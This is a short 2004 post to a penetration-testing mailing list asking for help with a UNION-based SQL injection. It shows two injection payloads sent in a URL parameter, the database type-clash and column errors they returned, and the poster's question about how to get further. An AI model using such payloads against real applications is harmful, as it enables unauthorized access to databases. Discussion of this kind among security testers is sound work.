Penetration Testing mailing list archives
SQL Injection & incompatible with int issue
From: Peter Bair <peterbair100 () hotmail com>
Date: 9 Jun 2004 23:51:06 -0000
I am currently testing an application that reveals its tables. I know the exact columns to perform a union, but when I try the following:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+--

RESULT: Operand type clash: text is incompatible with int

So I will try the solution:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--

RESULT: Invalid column name 'text'.

I know that "text" is in the correct position and I tried 'text'. Is this app safe or can I go further? Thanks for any help.